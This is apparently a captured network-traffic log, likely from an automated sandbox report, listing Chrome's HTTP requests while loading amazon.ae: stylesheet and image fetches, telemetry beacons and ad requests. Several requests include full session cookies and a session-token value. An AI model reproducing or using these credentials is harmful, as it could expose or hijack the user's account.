Source: global trafficHTTP traffic detected: GET /images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,3137XxvMS8L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11vQ-WiqGQL.css,01QhqFH8I8L.css,21Ol27dM9tL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,012f1fcyibL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&zH5KQLF9 HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=179369-179369If-Range: Thu, 04 Jun 2020 16:54:02 GMT
Source: global trafficHTTP traffic detected: GET /images/G/39/AHS_UAE/2022/GW/SWM/CarRental-SWM-en-400x39._CB630585803_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3AbrowserQuiteFn%26pc%3D41603%26at%3D41603%26t%3D1723469044601%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-06%7CmutObsYes%7Cnavbar%7CFWCIMEnabled%7Cfls-eu-amazon-ae%7CperfYes%7Ccf_cdn_fr%7Ccf_cdn_mp%7Caui%3Asw%3Apage_proxy%3Ano_ctrl%7Cadblk_no%7CgwCFImgNoCache%7CmutObsActive%7Cadrender%3A3221523e-c639-400a-a04d-789177f02209%7Cadrender%3AGateway%3Adesktop-ad-center-1%3Adesktop%7Cadrender%3Asafeframe%3A3221523e-c639-400a-a04d-789177f02209%7Cadrender%3Asafeframe%3AGateway%3Adesktop-ad-center-1%3Adesktop%7Cadrender%3A3221523e-c639-400a-a04d-789177f02209%3Acreativetemplatename%3Aimage%7Cadrender%3AGateway%3Adesktop-ad-center-1%3Adesktop%3Acreativetemplatename%3Aimage%7Cadrender%3A3221523e-c639-400a-a04d-789177f02209%3Acreativeid%3A577653937781864011%7Cadrender%3AGateway%3Adesktop-ad-center-1%3Adesktop%3Acreativeid%3A577653937781864011%7Cadrender%3A3221523e-c639-400a-a04d-789177f02209%3Aprogramid%3A1001%7Cadrender%3AGateway%3Adesktop-ad-center-1%3Adesktop%3Aprogramid%3A1001%7Ccsm-feature-touch-enabled%3Afalse%7Caui%3Acss%3Anetwork%7Caui%3Ajs%3Anetwork%7CfourColumn%7CthreeColumnRevised%7CflexLayout%7CcssGridLayout%7CbrowserQuiteFn%26viz%3Dhidden%3A6%7Cvisible%3A17357%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41603 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D1293%26pc0%3D1810%26ld0%3D1810%26t0%3D1723469004808%26sc1%3Dportal-bb%26pc1%3D3%26ld1%3D3%26t1%3D1723469004315%26sc2%3DheroAf%26cf2%3D1391%26pc2%3D1391%26ld2%3D1391%26t2%3D1723469004389%26sc3%3Dh1Af%26cf3%3D1394%26pc3%3D1394%26ld3%3D1394%26t3%3D1723469004392%26sc4%3DnavCF%26cf4%3D1440%26pc4%3D1440%26ld4%3D1440%26t4%3D1723469004438%26sc5%3DcsmCELLSframework%26bb5%3D1601%26pc5%3D1601%26ld5%3D1602%26t5%3D1723469004600%26sc6%3DcsmCELLSpdm%26bb6%3D1602%26pc6%3D1775%26ld6%3D1775%26t6%3D1723469004773%26sc7%3DcsmCELLSvpm%26bb7%3D1775%26pc7%3D1776%26ld7%3D1776%26t7%3D1723469004774%26sc8%3DcsmCELLSfem%26bb8%3D1776%26pc8%3D1777%26ld8%3D1777%26t8%3D1723469004775%26sc9%3Due_sushi_v1%26bb9%3D1779%26pc9%3D1780%26ld9%3D1780%26t9%3D1723469004778%26sc10%3Ddesktop-grid-1-visible%26cf10%3D2958%26pc10%3D2958%26ld10%3D2958%26t10%3D1723469005956%26sc11%3Dgw-ftGr-desktop-hero-1-visible%26cf11%3D3071%26pc11%3D3071%26ld11%3D3071%26t11%3D1723469006069%26sc12%3Ddesktop-grid-2-visible%26cf12%3D3382%26pc12%3D3382%26ld12%3D3382%26t12%3D1723469006380%26sc13%3Dadplacements%3AsfImpression%3A3221523e-c639-400a-a04d-789177f02209%26bb13%3D3601%26pc13%3D25747%26ld13%3D25720%26t13%3DMon%20Aug%2012%202024%2009%3A23%3A48%20GMT-0400%20(Eastern%20Daylight%20Time)%26sc14%3Dadplacements%3AsfImpression%3AGateway%3Adesktop-ad-center-1%3Adesktop%26bb14%3D3601%26pc14%3D25747%26ld14%3D25720%26t14%3DMon%20Aug%2012%202024%2009%3A23%3A48%20GMT-0400%20(Eastern%20Daylight%20Time)%26sc15%3Ddesktop-grid-3-visible%26cf15%3D4105%26pc15%3D4105%26ld15%3D4105%26t15%3D1723469007103%26sc16%3Ddesktop-grid-4-visible%26cf16%3D4863%26pc16%3D4863%26ld16%3D4863%26t16%3D1723469007861%26sc17%3Ddesktop-grid-5-visible%26cf17%3D6360%26pc17%3D6360%26ld17%3D6360%26t17%3D1723469009358%26sc18%3Ddesktop-grid-6-visible%26cf18%3D7183%26pc18%3D7183%26ld18%3D7183%26t18%3D1723469010181%26sc19%3Ddesktop-grid-7-visible%26cf19%3D7844%26pc19%3D7844%26ld19%3D7844%26t19%3D1723469010842%26sc20%3Ddesktop-grid-8-visible%26cf20%3D8716%26pc20%3D8716%26ld20%3D8716%26t20%3D1723469011714%26sc21%3DspLoadJs%26cf21%3D8717%26pc21%3D8717%26ld21%3D8717%26t21%3D1723469011715%26sc22%3Ddesktop-1-visible%26cf22%3D11123%26pc22%3D11123%26ld22%3D11123%26t22%3D1723469014121%26sc23%3Ddesktop-btf-grid-1-visible%26cf23%3D18335%26pc23%3D18335%26ld23%3D18335%26t23%3D1723469021333%26sc24%3Ddesktop-btf-grid-2-visible%26cf24%3D18375%26pc24%3D18375%26ld24%3D18375%26t24%3D1723469021373%26sc25%3Ddesktop-btf-grid-3-visible%26cf25%3D18908%26pc25%3D18908%26ld25%3D18908%26t25%3D1723469021906%26sc26%3Ddesktop-btf-grid-4-visible%26cf26%3D19474%26pc26%3D19474%26ld26%3D19474%26t26%3D1723469022472%26sc27%3Ddesktop-btf-grid-5-visible%26cf27%3D20224%26pc27%3D20224%26ld27%3D20224%26t27%3D1723469023222%26sc28%3Ddesktop-btf-grid-6-visible%26cf28%3D20323%26pc28%3D20323%26ld28%3D20323%26t28%
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3AstartVL%26pc%3D41612%26at%3D41612%26t%3D1723469044610%26csmtags%3DstartVL%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41611 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,3137XxvMS8L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11vQ-WiqGQL.css,01QhqFH8I8L.css,21Ol27dM9tL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,012f1fcyibL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&zH5KQLF9 HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=179369-211441If-Range: Thu, 04 Jun 2020 16:54:02 GMT
Source: global trafficHTTP traffic detected: GET /images/G/39/AHS_UAE/2022/GW/SWM/CarRental-SWM-en-400x39._CB630585803_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/iu3?d=amazon.ae&slot=navFooter&a2=01018163eecaf7712c47f919b4fe519c2bd46c2dc95cd92eeb2825c833cd7da6a768&old_oo=0&ts=1723469004166&s=ART4IShklipn4DF0jFH5c9j-o_lVqpVJDsDOZ_ZLQxmn&gdpr_consent=&gdpr_consent_avl=&cb=1723469004166 HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D40564%26pc%3D41613%26at%3D41613%26t%3D1723469044611%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41612 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D40564%26pc%3D41613%26at%3D41613%26t%3D1723469044611%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41612 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"device-memory: 8rtt: 250sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-viewport-width: 1280sec-ch-device-memory: 8viewport-width: 1280sec-ch-ua-platform-version: "10.0.0"dpr: 1downlink: 1.35sec-ch-dpr: 1ect: 3gsec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK; csm-hit=adb:adblk_no&t:1723469020355&tb:C37SFEY0GDXEZ5HDEVRN+s-C37SFEY0GDXEZ5HDEVRN|1723469020355
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3AbrowserQuiteFn%26pc%3D41603%26at%3D41603%26t%3D1723469044601%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-06%7CmutObsYes%7Cnavbar%7CFWCIMEnabled%7Cfls-eu-amazon-ae%7CperfYes%7Ccf_cdn_fr%7Ccf_cdn_mp%7Caui%3Asw%3Apage_proxy%3Ano_ctrl%7Cadblk_no%7CgwCFImgNoCache%7CmutObsActive%7Cadrender%3A3221523e-c639-400a-a04d-789177f02209%7Cadrender%3AGateway%3Adesktop-ad-center-1%3Adesktop%7Cadrender%3Asafeframe%3A3221523e-c639-400a-a04d-789177f02209%7Cadrender%3Asafeframe%3AGateway%3Adesktop-ad-center-1%3Adesktop%7Cadrender%3A3221523e-c639-400a-a04d-789177f02209%3Acreativetemplatename%3Aimage%7Cadrender%3AGateway%3Adesktop-ad-center-1%3Adesktop%3Acreativetemplatename%3Aimage%7Cadrender%3A3221523e-c639-400a-a04d-789177f02209%3Acreativeid%3A577653937781864011%7Cadrender%3AGateway%3Adesktop-ad-center-1%3Adesktop%3Acreativeid%3A577653937781864011%7Cadrender%3A3221523e-c639-400a-a04d-789177f02209%3Aprogramid%3A1001%7Cadrender%3AGateway%3Adesktop-ad-center-1%3Adesktop%3Aprogramid%3A1001%7Ccsm-feature-touch-enabled%3Afalse%7Caui%3Acss%3Anetwork%7Caui%3Ajs%3Anetwork%7CfourColumn%7CthreeColumnRevised%7CflexLayout%7CcssGridLayout%7CbrowserQuiteFn%26viz%3Dhidden%3A6%7Cvisible%3A17357%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41603 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D1293%26pc0%3D1810%26ld0%3D1810%26t0%3D1723469004808%26sc1%3Dportal-bb%26pc1%3D3%26ld1%3D3%26t1%3D1723469004315%26sc2%3DheroAf%26cf2%3D1391%26pc2%3D1391%26ld2%3D1391%26t2%3D1723469004389%26sc3%3Dh1Af%26cf3%3D1394%26pc3%3D1394%26ld3%3D1394%26t3%3D1723469004392%26sc4%3DnavCF%26cf4%3D1440%26pc4%3D1440%26ld4%3D1440%26t4%3D1723469004438%26sc5%3DcsmCELLSframework%26bb5%3D1601%26pc5%3D1601%26ld5%3D1602%26t5%3D1723469004600%26sc6%3DcsmCELLSpdm%26bb6%3D1602%26pc6%3D1775%26ld6%3D1775%26t6%3D1723469004773%26sc7%3DcsmCELLSvpm%26bb7%3D1775%26pc7%3D1776%26ld7%3D1776%26t7%3D1723469004774%26sc8%3DcsmCELLSfem%26bb8%3D1776%26pc8%3D1777%26ld8%3D1777%26t8%3D1723469004775%26sc9%3Due_sushi_v1%26bb9%3D1779%26pc9%3D1780%26ld9%3D1780%26t9%3D1723469004778%26sc10%3Ddesktop-grid-1-visible%26cf10%3D2958%26pc10%3D2958%26ld10%3D2958%26t10%3D1723469005956%26sc11%3Dgw-ftGr-desktop-hero-1-visible%26cf11%3D3071%26pc11%3D3071%26ld11%3D3071%26t11%3D1723469006069%26sc12%3Ddesktop-grid-2-visible%26cf12%3D3382%26pc12%3D3382%26ld12%3D3382%26t12%3D1723469006380%26sc13%3Dadplacements%3AsfImpression%3A3221523e-c639-400a-a04d-789177f02209%26bb13%3D3601%26pc13%3D25747%26ld13%3D25720%26t13%3DMon%20Aug%2012%202024%2009%3A23%3A48%20GMT-0400%20(Eastern%20Daylight%20Time)%26sc14%3Dadplacements%3AsfImpression%3AGateway%3Adesktop-ad-center-1%3Adesktop%26bb14%3D3601%26pc14%3D25747%26ld14%3D25720%26t14%3DMon%20Aug%2012%202024%2009%3A23%3A48%20GMT-0400%20(Eastern%20Daylight%20Time)%26sc15%3Ddesktop-grid-3-visible%26cf15%3D4105%26pc15%3D4105%26ld15%3D4105%26t15%3D1723469007103%26sc16%3Ddesktop-grid-4-visible%26cf16%3D4863%26pc16%3D4863%26ld16%3D4863%26t16%3D1723469007861%26sc17%3Ddesktop-grid-5-visible%26cf17%3D6360%26pc17%3D6360%26ld17%3D6360%26t17%3D1723469009358%26sc18%3Ddesktop-grid-6-visible%26cf18%3D7183%26pc18%3D7183%26ld18%3D7183%26t18%3D1723469010181%26sc19%3Ddesktop-grid-7-visible%26cf19%3D7844%26pc19%3D7844%26ld19%3D7844%26t19%3D1723469010842%26sc20%3Ddesktop-grid-8-visible%26cf20%3D8716%26pc20%3D8716%26ld20%3D8716%26t20%3D1723469011714%26sc21%3DspLoadJs%26cf21%3D8717%26pc21%3D8717%26ld21%3D8717%26t21%3D1723469011715%26sc22%3Ddesktop-1-visible%26cf22%3D11123%26pc22%3D11123%26ld22%3D11123%26t22%3D1723469014121%26sc23%3Ddesktop-btf-grid-1-visible%26cf23%3D18335%26pc23%3D18335%26ld23%3D18335%26t23%3D1723469021333%26sc24%3Ddesktop-btf-grid-2-visible%26cf24%3D18375%26pc24%3D18375%26ld24%3D18375%26t24%3D1723469021373%26sc25%3Ddesktop-btf-grid-3-visible%26cf25%3D18908%26pc25%3D18908%26ld25%3D18908%26t25%3D1723469021906%26sc26%3Ddesktop-btf-grid-4-visible%26cf26%3D19474%26pc26%3D19474%26ld26%3D19474%26t26%3D1723469022472%26sc27%3Ddesktop-btf-grid-5-visible%26cf27%3D20224%26pc27%3D20224%26ld27%3D20224%26t27%3D1723469023222%26sc28%3Ddesktop-btf-grid-6-visible%26cf28%3D20323%26pc28%3D20323%26ld28%3D20323%26t28%
